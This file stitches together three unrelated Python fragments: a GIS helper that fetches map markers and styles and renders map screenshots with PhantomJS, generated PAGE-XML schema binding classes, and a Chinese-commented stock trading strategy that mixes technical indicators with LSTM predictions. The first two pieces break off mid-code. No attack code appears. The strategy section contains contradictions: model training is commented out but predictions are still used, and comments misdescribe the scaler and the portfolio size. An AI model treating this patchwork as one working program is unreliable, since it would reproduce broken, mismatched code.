left = (stable.on((stable.layer_id == ftable.layer_id) & \
(stable.record_id == None) & \
((stable.config_id == config.id) | \
(stable.config_id == None))),
mtable.on(mtable.id == stable.marker_id),
)
if filter:
query &= (ftable.filter == filter)
if current.deployment_settings.get_database_type() == "postgres":
# None is last
orderby = stable.config_id
else:
# None is 1st
orderby = ~stable.config_id
layers = db(query).select(mtable.image,
mtable.height,
mtable.width,
ftable.style_default,
stable.gps_marker,
left=left,
orderby=orderby)
if len(layers) > 1:
layers.exclude(lambda row: row["gis_layer_feature.style_default"] == False)
if len(layers) == 1:
layer = layers.first()
else:
# Can't differentiate
layer = None
if layer:
_marker = layer["gis_marker"]
if _marker.image:
marker = {"image": _marker.image,
"height": _marker.height,
"width": _marker.width,
"gps_marker": layer["gis_style"].gps_marker,
}
if not marker:
# Default
from .marker import Marker
marker = Marker().as_dict()
return marker
# -------------------------------------------------------------------------
@staticmethod
def get_style(layer_id=None,
aggregate=None,
):
"""
Returns a Style dict
- called by S3Report.geojson()
"""
from .style import Style
style = None
if layer_id:
style = Style(layer_id=layer_id,
aggregate=aggregate).as_dict()
if not style:
# Default
style = Style().as_dict()
return style
# -------------------------------------------------------------------------
@staticmethod
def get_screenshot(config_id, temp=True, height=None, width=None):
"""
Save a Screenshot of a saved map
@requires:
PhantomJS http://phantomjs.org
Selenium https://pypi.python.org/pypi/selenium
"""
# @ToDo: allow selection of map_id
map_id = "default_map"
#from selenium import webdriver
# We include a Custom version which is patched to access native PhantomJS functions from:
# https://github.com/watsonmw/ghostdriver/commit/d9b65ed014ed9ff8a5e852cc40e59a0fd66d0cf1
from webdriver import WebDriver
from selenium.common.exceptions import TimeoutException, WebDriverException
from selenium.webdriver.support.ui import WebDriverWait
request = current.request
cachepath = os.path.join(request.folder, "static", "cache", "jpg")
if not os.path.exists(cachepath):
try:
os.mkdir(cachepath)
except OSError as os_error:
error = "GIS: JPEG files cannot be saved: %s %s" % \
(cachepath, os_error)
current.log.error(error)
current.session.error = error
redirect(URL(c="gis", f="index", vars={"config": config_id}))
# Copy the current working directory to revert back to later
cwd = os.getcwd()
# Change to the Cache folder (can't render directly there from execute_phantomjs)
os.chdir(cachepath)
#driver = webdriver.PhantomJS()
# Disable Proxy for Win32 Network Latency issue
driver = WebDriver(service_args=["--proxy-type=none"])
# Change back for other parts
os.chdir(cwd)
settings = current.deployment_settings
if height is None:
# Set the size of the browser to match the map
height = settings.get_gis_map_height()
if width is None:
width = settings.get_gis_map_width()
# For Screenshots
#height = 410
#width = 820
driver.set_window_size(width + 5, height + 20)
# Load the homepage
# (Cookie needs to be set on same domain as it takes effect)
base_url = "%s/%s" % (settings.get_base_public_url(),
request.application)
driver.get(base_url)
response = current.response
session_id = response.session_id
if not current.auth.override:
# Reuse current session to allow access to ACL-controlled resources
driver.add_cookie({"name": response.session_id_name,
"value": session_id,
"path": "/",
})
# For sync connections
current.session._unlock(response)
# Load the map
url = "%s/gis/map_viewing_client?print=1&config=%s" % (base_url,
config_id)
driver.get(url)
# Wait for map to load (including it's layers)
# Alternative approach: https://raw.githubusercontent.com/ariya/phantomjs/master/examples/waitfor.js
def map_loaded(driver):
test = '''return S3.gis.maps['%s'].s3.loaded''' % map_id
try:
result = driver.execute_script(test)
except WebDriverException:
result = False
return result
try:
# Wait for up to 100s (large screenshots take a long time for layers to load)
WebDriverWait(driver, 100).until(map_loaded)
except TimeoutException as e:
driver.quit()
current.log.error("Timeout: %s" % e)
return None
# Save the Output
# @ToDo: Can we use StringIO instead of cluttering filesystem?
# @ToDo: Allow option of PDF (as well as JPG)
# https://github.com/ariya/phantomjs/blob/master/examples/rasterize.js
if temp:
filename = "%s.jpg" % session_id
else:
filename = "config_%s.jpg" % config_id
# Cannot control file size (no access to clipRect) or file format
#driver.save_screenshot(os.path.join(cachepath, filename))
#driver.page.clipRect = {"top": 10,
# "left": 5,
# "width": width,
# "height": height
# }
#driver.page.render(filename, {"format": "jpeg", "quality": "100"})
script = '''
var page = this;
page.clipRect = {top: 10,
left: 5,
width: %(width)s,
height: %(height)s
};
page.render('%(filename)s', {format: 'jpeg', quality: '100'});''' % \
{"width": width,
"height": height,
"filename": filename,
}
try:
result = driver.execute_phantomjs(script)
except WebDriverException as e:
driver.quit()
current.log.error("WebDriver crashed: %s" % e)
return None
driver.quit()
if temp:
# This was a temporary config for creating the screenshot, | |
the paper of a printed page. Its size
is equal for all pages of a book (exceptions: titlepage, multipage
pictures).
It contains all living elements (except marginals) like body type,
footnotes, headings, running titles.
It does not contain pagenumber (if not part of running title), marginals,
signature mark, preview words."""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, Coords=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.Coords = Coords
self.Coords_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, PrintSpaceType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if PrintSpaceType.subclass:
return PrintSpaceType.subclass(*args_, **kwargs_)
else:
return PrintSpaceType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def hasContent_(self):
if (
self.Coords is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='PrintSpaceType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('PrintSpaceType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'PrintSpaceType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='PrintSpaceType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='PrintSpaceType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='PrintSpaceType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='PrintSpaceType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
# end class PrintSpaceType
class ReadingOrderType(GeneratedsSuper):
"""Definition of the reading order within the page. To express a reading
order between elements they have to be included in an OrderedGroup.
Groups may contain further groups."""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, OrderedGroup=None, UnorderedGroup=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.OrderedGroup = OrderedGroup
self.OrderedGroup_nsprefix_ = None
self.UnorderedGroup = UnorderedGroup
self.UnorderedGroup_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ReadingOrderType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ReadingOrderType.subclass:
return ReadingOrderType.subclass(*args_, **kwargs_)
else:
return ReadingOrderType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_OrderedGroup(self):
return self.OrderedGroup
def set_OrderedGroup(self, OrderedGroup):
self.OrderedGroup = OrderedGroup
def get_UnorderedGroup(self):
return self.UnorderedGroup
def set_UnorderedGroup(self, UnorderedGroup):
self.UnorderedGroup = UnorderedGroup
def hasContent_(self):
if (
self.OrderedGroup is not None or
self.UnorderedGroup is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='ReadingOrderType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ReadingOrderType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ReadingOrderType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ReadingOrderType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ReadingOrderType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ReadingOrderType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='ReadingOrderType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.OrderedGroup is not None:
namespaceprefix_ = self.OrderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroup_nsprefix_) else ''
self.OrderedGroup.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroup', pretty_print=pretty_print)
if self.UnorderedGroup is not None:
namespaceprefix_ = self.UnorderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroup_nsprefix_) else ''
self.UnorderedGroup.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroup', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'OrderedGroup':
obj_ = OrderedGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.OrderedGroup = obj_
obj_.original_tagname_ = 'OrderedGroup'
elif nodeName_ == 'UnorderedGroup':
obj_ = UnorderedGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnorderedGroup = obj_
obj_.original_tagname_ = 'UnorderedGroup'
# end class ReadingOrderType
class RegionRefIndexedType(GeneratedsSuper):
"""Numbered regionPosition (order number) of this item within the current
hierarchy level."""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, index=None, regionRef=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.index = _cast(int, index)
self.index_nsprefix_ = None
self.regionRef = _cast(None, regionRef)
self.regionRef_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RegionRefIndexedType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RegionRefIndexedType.subclass:
return RegionRefIndexedType.subclass(*args_, **kwargs_)
else:
return RegionRefIndexedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_index(self):
return self.index
def set_index(self, index):
self.index = index
def get_regionRef(self):
return self.regionRef
def set_regionRef(self, regionRef):
self.regionRef = regionRef
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='RegionRefIndexedType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('RegionRefIndexedType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'RegionRefIndexedType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RegionRefIndexedType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RegionRefIndexedType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RegionRefIndexedType'):
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
if self.regionRef is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='RegionRefIndexedType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
self.index = self.gds_parse_integer(value, node, 'index')
value = find_attr_value_('regionRef', node)
if value is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
self.regionRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class RegionRefIndexedType
class OrderedGroupIndexedType(GeneratedsSuper):
"""Indexed group containing ordered elementsPosition (order number) of this
item within the current hierarchy level."""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, id=None, index=None, RegionRefIndexed=None, OrderedGroupIndexed=None, UnorderedGroupIndexed=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.index = _cast(int, index)
self.index_nsprefix_ = None
if RegionRefIndexed is None:
self.RegionRefIndexed = []
else:
self.RegionRefIndexed = RegionRefIndexed
self.RegionRefIndexed_nsprefix_ = None
if OrderedGroupIndexed is None:
self.OrderedGroupIndexed = []
else:
self.OrderedGroupIndexed = OrderedGroupIndexed
self.OrderedGroupIndexed_nsprefix_ = None
if UnorderedGroupIndexed is None:
self.UnorderedGroupIndexed = []
else:
self.UnorderedGroupIndexed = UnorderedGroupIndexed
self.UnorderedGroupIndexed_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, OrderedGroupIndexedType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if OrderedGroupIndexedType.subclass:
return OrderedGroupIndexedType.subclass(*args_, **kwargs_)
else:
return OrderedGroupIndexedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = | |
# 导入所需的库
import pandas as pd
import numpy as np
import talib as tl
import tensorflow as tf
from sklearn.preprocessing import MinMaxScaler
# 股票策略模版
# 初始化函数,全局只运行一次
def init(context):
set_benchmark('000300.SH')
log.info('策略开始运行,初始化函数全局只运行一次')
set_commission(PerShare(type='stock',cost=0.0002))
set_slippage(PriceSlippage(0.005))
set_volume_limit(0.25,0.5)
set_params(context) # 设置策略常量
set_variables(context) # 设置中间变量
context.n = 10
context.SECURITT_SIZE = 30
context.TRADE_STOCK_SIZE = 10
run_monthly(update_trade_stocks,date_rule=1)
# 筛选出2005年上市且2019年尚未退市的股票池
context.securities = get_securities()[:context.SECURITT_SIZE]
# 获取08-16年季度财务数据
#context.final_states = get_all_financial_statments(context.securities)
# 获取的因子名称
context.factor_info = ['asharedebt_stat_equity_ratio_mrq','ashareoperate_stat_account_receive_turnover_ttm','ashareoperate_stat_accounts_payable_turnover_ttm','ashareoperate_stat_total_capital_turnover_ttm','ashareprofit_stat_net_sales_rate_ttm','asharevalue_stat_pb_mrq','asharevalue_stat_pe_ttm','asharevalue_stat_ps_ttm','asharevalue_stat_total_mv','balance_stat_accrued_wages','balance_stat_current_liabilities','balance_stat_fixed_asset','balance_stat_receivable_other','cashflow_sq_stat_net_increase_in_cce','growth_stat_ncf_of_oa_yoy','income_sq_stat_basic_eps','income_sq_stat_net_profit','income_sq_stat_overall_income','profit_sq_stat_roe_one_season']
# (从文件获取08-16年季度财务数据
print("====== 获取季度财务数据中 ======")
context.final_states = {}
count = 0
for stock in context.securities:
count = count + 1
context.final_states[stock] = pd.read_csv('fundamental_data/%s'%stock)[context.factor_info]
if count%10 == 0:
print('(%d/%d)'%(count, len(context.securities)), end='\t')
context.models = {}
context.scalers = {}
count = 0
print("====== 模型训练中 ======")
for stock in context.securities:
count = count + 1
context.models[stock] = LSTM(name_scope=stock, input_size=context.final_states[stock].shape[1], time_steps=4, epoches=1)
# 数据标准化,均值=0,方差=1
scaler = MinMaxScaler()
context.final_states[stock] = scaler.fit_transform(context.final_states[stock])
context.scalers[stock] = scaler
# 模型训练
#context.models[stock].train(dataset=context.final_states[stock])
if count%10 == 0:
print('(%d/%d)'%(count,len(context.securities)))
## 开盘时运行函数, 用WR、RSI、OBV、PVT、BBI、VOSC技术指标进行量化择时
def handle_bar(context, bar_dict):
# 计算交易信号
for stock in context.trade_stocks:
context.signal[stock] = stock_to_signals(context,bar_dict,stock)
# 执行买卖操作
trade_operation(context,stock)
def update_trade_stocks(context, bar_dict):
current_date = get_datetime()
# 如果当前持仓数为0, 应重新因子打分法选出新的股票池
if len(list(context.portfolio.stock_account.positions.keys())) == 0:
year = current_date.strftime('%Y')
month = current_date.strftime('%m')
print('year:',year,'\tmonth:',month)
year = int(year)
month = int(month)
fundamental_dates = []
if month>=1 and month<=3:
for season in ['q1','q2','q3','q4']:
date = "%d%s" % (year-1, season)
fundamental_dates.append(date)
elif month>=4 and month<=6:
for season in ['q2','q3','q4']:
date = "%d%s" % (year-1, season)
fundamental_dates.append(date)
fundamental_dates.append("%dq1"%(year))
elif month>=7 and month<=9:
for season1 in ['q3','q4']:
date = "%d%s" % (year-1, season1)
fundamental_dates.append(date)
for season2 in ['q1','q2']:
date = "%d%s" % (year, season2)
fundamental_dates.append(date)
elif month>=10 and month<=12:
fundamental_dates.append("%dq4"%(year-1))
for season in ['q1','q2','q3']:
date = "%d%s" % (year, season)
fundamental_dates.append(date)
else:
fundamental_dates = get_fundamentals_dates(current_date)
if fundamental_dates:
# 如果到了下一季度初,应重新因子打分法选出新的股票池
df_fundamental = pd.DataFrame(columns=context.factor_info)
for stock in context.securities:
# df存储前4季度的财务因子数据
df = pd.DataFrame()
q = get_fundamental_q(stock)
for date in fundamental_dates:
fundamental = get_fundamentals(query_object=q,statDate=date)
if not fundamental.empty:
df = df.append(fundamental)
else:
nan = np.zeros((1,))
nan[nan == 0] = np.nan
df = df.append(pd.DataFrame(nan))
df = handle_stock_df(df)
# 用对应的股票模型进行预测
stock_prediction = context.models[stock].predict(df.values)
# 返回未经inverse_transform的prediction
df_prediction = pd.DataFrame(stock_prediction, columns=context.factor_info)
df_prediction.insert(0, 'stock', stock)
df_fundamental = df_fundamental.append(df_prediction)
df_fundamental = df_fundamental.reset_index(drop=True)
# 使用因子打分法对股票进行排序,返回前300支股票作为trade_stock
context.trade_stocks = score_factors(df_fundamental, context.TRADE_STOCK_SIZE)
## ===================== 以下为功能函数 =======================
#1.设置策略参数
def set_params(context):
context.SMA_s = 4 # 设置SMA短期均线日期
context.SMA_l = 40 # 设置SMA长期均线日期
context.fastperiod = 12 # 设置MACD的fastperiod
context.slowperiod = 26 # 设置MACD的slowperiod
context.signalperiod = 9 # 设置MACD的signalperiod
context.DMA_S = 4 # 设置DMA的短期均线日期S
context.DMA_L = 40 # 设置DMA的长期均线日期L
context.DMA_M = 20 # 设置DMA的均线差值
context.TRIX_N = 20 # 设置TRIX的N值
context.TRIX_M = 60 # 设置TRIX的M值
#2.设置中间变量
def set_variables(context):
context.signal = {} # 设置信号值(1或0空仓,3买入)
#4.计算SMA信号
def SMA_signal(context,bar_dict,stock):
value = history(stock,['close'],200,'1d',True,'pre')
value = value.dropna()
close = value.close.values
# 计算移动均线值
sma = tl.SMA(close,context.SMA_s)
lma = tl.SMA(close,context.SMA_l)
# 判断信号
if sma[-1]>sma[-2] and sma[-1]>lma[-1] and sma[-2]<lma[-2]:
return 1
elif sma[-1]<sma[-2] and sma[-1]<lma[-1] and sma[-2]>lma[-2]:
return -1
else:
return 0
#5.计算MACD信号
def MACD_signal(context,bar_dict,stock):
value = history(stock,['close'],200,'1d',True,'pre')
value = value.dropna()
close = value.close.values
# 计算macd值
macd, dif, dea = tl.MACD(close,context.fastperiod,context.slowperiod,context.signalperiod)
# 判断信号
if dif[-1]>dif[-2] and dif[-1]>dea[-1] and dif[-2]<dea[-2] and dif[-1]>0:
return 1
elif dif[-1]<dif[-2] and dif[-1]<dea[-1] and dif[-2]>dea[-2] and dif[-1]<0:
return -1
else:
return 0
#6.计算DMA信号
def DMA_signal(context,bar_dict,stock):
value = history(stock,['close'],200,'1d',True,'pre')
value = value.dropna()
close = value.close.values
# 计算移动均线值和差值
sma = tl.SMA(close,context.DMA_S)
lma = tl.SMA(close,context.DMA_L)
# 计算DMA
DMA = sma-lma
AMA = tl.SMA(DMA,context.DMA_M)
# 判断信号
if DMA[-1]>DMA[-2] and DMA[-1]>AMA[-1] and DMA[-2]<AMA[-2]:
return 1
elif DMA[-1]<DMA[-2] and DMA[-1]<AMA[-1] and DMA[-2]>AMA[-2]:
return -1
else:
return 0
#7.计算TRIX信号
def TRIX_signal(context,bar_dict,stock):
value = history(stock,['close'],300,'1d',True,'pre')
value = value.dropna()
close = value.close.values
# 计算TR
EMA1 = tl.SMA(close,context.TRIX_N)
EMA2 = tl.SMA(EMA1,context.TRIX_N)
TR = tl.SMA(EMA2,context.TRIX_N)
# 计算TRIX 和 MATTRIX
value['TR'] = TR
value['TRIX'] = value.TR/value.TR.shift(1)-1.0
TRIX = value.TRIX.values
MATTRIX = tl.SMA(TRIX,context.TRIX_M)
# 判断信号
if TRIX[-1]>TRIX[-2] and TRIX[-1]>MATTRIX[-1] and TRIX[-2]<MATTRIX[-2]:
return 1
elif TRIX[-1]<TRIX[-2] and TRIX[-1]<MATTRIX[-1] and TRIX[-2]>MATTRIX[-2]:
return -1
else:
return 0
#8.计算交易信号
def stock_to_signals(context,bar_dict,stock):
signal_1 = SMA_signal(context,bar_dict,stock) #计算SMA信号
signal_2 = MACD_signal(context,bar_dict,stock) #计算MACD信号
signal_3 = DMA_signal(context,bar_dict,stock) #计算DMA信号
signal_4 = TRIX_signal(context,bar_dict,stock) #计算TRIX信号
#返回信号值
return signal_1+signal_2+signal_3+signal_4
#9.执行买卖操作
def trade_operation(context,stock):
if context.signal[stock]>=1 and len(list(context.portfolio.stock_account.positions.keys()))<context.n:
number = context.n - len(list(context.portfolio.stock_account.positions.keys()))
order_value(stock,context.portfolio.stock_account.available_cash/number)
if context.signal[stock]<=-1:
if stock in list(context.portfolio.stock_account.positions.keys()):
order_target(stock, 0)
# 筛选出2005年上市且2019年尚未退市的股票池,用于获取训练数据
def get_securities():
# 获取A股所有股票
univers = list(get_all_securities('stock').index)
# 筛选出2005年以前上市且尚未退市的股票
securities = []
for stock in univers:
info = get_security_info(stock)
if info.start_date.strftime("%Y") <= '2005' and info.end_date.strftime("%Y") == '2200':
securities.append(stock)
# 剔除股票池中ST>=0.3的股票
stock_list = []
for stock in securities:
st_days = np.sum(get_price(securities=stock, start_date='20060101', end_date='20141230', fields=['is_st']))['is_st']
if st_days < 9*250*0.3:
stock_list.append(stock)
securities = stock_list
return securities
def get_fundamental_q(stock):
q = query(
asharevalue.pe_ttm,#市盈率
asharevalue.pb_mrq,#市净率
asharevalue.ps_ttm,#市销率
profit_sq.roe_one_season,#净资产收益率roe(单季度)
income_sq.basic_eps,#基本每股收益
asharevalue.total_mv,#总市值
ashareprofit.net_sales_rate_ttm,#销售净利率
asharedebt.equity_ratio_mrq,#产权比率
balance.fixed_asset,#固定资产
#growth.net_asset_growth_ratio,#净资产(同比增长率)
#profit_report.asset,#总资产
#factor.opt_income_growth_ratio,#营业收入同比增长率
ashareoperate.account_receive_turnover_ttm,#应收账款周转率
ashareoperate.accounts_payable_turnover_ttm,#应付账款周转率
ashareoperate.total_capital_turnover_ttm,#总资产周转率
growth.ncf_of_oa_yoy,#经营活动产生的现金流量净额(同比增长率)
income_sq.overall_income,#营业总收入
#income_sq.overall_costs,#营业总成本
income_sq.net_profit,#净利润
cashflow_sq.net_increase_in_cce,#现金及现金等价物净增加额
#balance.long_term_receivables,#长期应收款
balance.receivable_other,#其他应收款
#balance.total_non_current_assets,#非流动资产合计
balance.accrued_wages,#应付职工薪酬
balance.current_liabilities#流动负债合计
).filter(
income_sq.symbol == stock)
return q
def handle_stock_df(df):
# 某行全为nan,则删除该行
#df = df.dropna(how='all')
# 某列缺失数据大于15%,则删除该列
#for column in list(df.columns[df.isnull().sum() > (len(df)*0.15)]):
# df.drop(column, axis=1, inplace=True)
# 缺失值用均值填充
for column in list(df.columns[df.isnull().sum()>0]):
mean_val = df[column].mean()
df[column].fillna(mean_val, inplace=True)
df = df.fillna(0)
try:
df = df.drop([0],axis=1)
except:
pass
return df
# 获取08-16年,共36个季度的数据
def get_all_financial_statments(securities):
years = [8,9,10,11,12,13,14,15,16]
seasons = [1,2,3,4]
stock_df_all = {}
count = 0 # 用于计数
for stock in securities:
count = count + 1
if count%10 == 0:
print(stock+'(%d/%d)'%(count, len(securities)), end='\t')
df = pd.DataFrame()
q = get_fundamental_q(stock)
for year in years:
for season in seasons:
date = '20%(year)02dq%(season)d'%{'year':year, 'season':season}
fundamental = get_fundamentals(query_object=q, statDate=date)
if fundamental.empty:
nan = np.zeros((1))
nan[nan == 0] = np.nan
df = df.append(pd.DataFrame(nan))
else:
df = df.append(fundamental)
df = handle_stock_df(df)
df = df.reset_index(drop=True)
stock_df_all[stock] = df
return stock_df_all
# 判断当前日期是否为获取季度财务报表的日期
def get_fundamentals_dates(date):
year = date.strftime('%Y')
month = date.strftime('%m')
print('year:',year,'\tmonth:',month)
year = int(year)
month = int(month)
fundamental_dates = []
if month == 1:
for season in ['q1','q2','q3','q4']:
date = "%d%s" % (year-1, season)
fundamental_dates.append(date)
elif month == 4:
for season in ['q2','q3','q4']:
date = "%d%s" % (year-1, season)
fundamental_dates.append(date)
fundamental_dates.append("%dq1"%(year))
elif month == 7:
for season1 in ['q3','q4']:
date = "%d%s" % (year-1, season1)
fundamental_dates.append(date)
for season2 in ['q1','q2']:
date = "%d%s" % (year, season2)
fundamental_dates.append(date)
elif month == 10:
fundamental_dates.append("%dq4"%(year-1))
for season in ['q1','q2','q3']:
date = "%d%s" % (year, season)
fundamental_dates.append(date)
return fundamental_dates
# 因子打分法选出股票池, 成长:估值:其他 = 5:3:2
